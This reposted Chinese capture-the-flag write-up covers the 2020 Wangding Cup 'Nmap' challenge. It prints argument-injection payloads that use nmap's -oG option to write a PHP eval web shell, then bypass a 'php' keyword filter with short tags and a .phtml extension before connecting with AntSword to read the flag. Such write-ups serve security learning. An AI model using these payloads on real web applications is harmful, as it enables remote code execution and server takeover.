码迷,mamicode.com
首页 > 其他好文 > 详细

[网鼎杯 2020 朱雀组]Nmap

时间:2020-05-29 19:49:08      阅读:352      评论:0      收藏:0      [点我收藏+]

标签:-o   online   target   lan   mic   绕过   成功   nmap   log   

技术图片

 

[BUUCTF 2018]Online Tool类似,直接用里面的payload

‘ <?php @eval($_POST["hack"]);?> -oG hack.php ‘

回显hacker,经查,php被过滤,使用短标签绕过

‘ <?= @eval($_POST["hack"]);?> -oG hack.phtml ‘

成功写入

访问一下

http://b829d549-378b-494f-87e4-a74d13e0c223.node3.buuoj.cn/hack.phtml

技术图片

 

蚁剑连接一波,在根目录下找到flag

[网鼎杯 2020 朱雀组]Nmap

标签:-o   online   target   lan   mic   绕过   成功   nmap   log   

原文地址:https://www.cnblogs.com/mech/p/12989057.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!